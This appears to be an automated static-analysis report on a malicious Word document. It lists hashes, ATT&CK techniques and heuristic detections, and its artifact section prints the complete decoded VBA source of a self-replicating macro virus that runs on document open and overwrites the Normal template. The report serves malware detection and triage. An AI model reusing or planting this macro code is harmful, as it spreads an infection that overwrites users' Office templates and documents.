Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 5cf944df60714119…

MALICIOUS

Office (OLE) / .DOC

Size: 190.1 KB
Created: 2021-04-08 08:08:00
Authoring application: WPS Office_11.1.0.11294_F1E327BC-269C-435d-A152-05C5408002CA
First seen: 2026-06-24
MD5: 7add719ce1c455bce5a8e6822f788374
SHA-1: 1b19a48448a4521e512d9755e85d7cf2c2546b86
SHA-256: 5cf944df607141196addde214448fe5f590dc6eafa0ce660af0c7997adbb3dad
Risk Score: 168

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic indicates the macro attempts to self-replicate by writing its code to the Normal template. The 'Document_Open' macro is designed to execute upon opening the document, and the script logic suggests it attempts to save the document after modifying the Normal template, potentially establishing persistence. The ClamAV detection name 'Doc.Macro.APMPKILL-6097118-0' is included as an IOC.

Heuristics (5)

  • ClamAV: Doc.Macro.APMPKILL-6097118-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
        .DeleteLines 1, .CountOfLines
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   1025 bytes
SHA-256: b6bb40c3324a9a55276682d3a04936515debedc19798cd9b4db60b6bc4ef53ca
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'KILL
   On Error Resume Next
    Set prevDocument = NormalTemplate
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub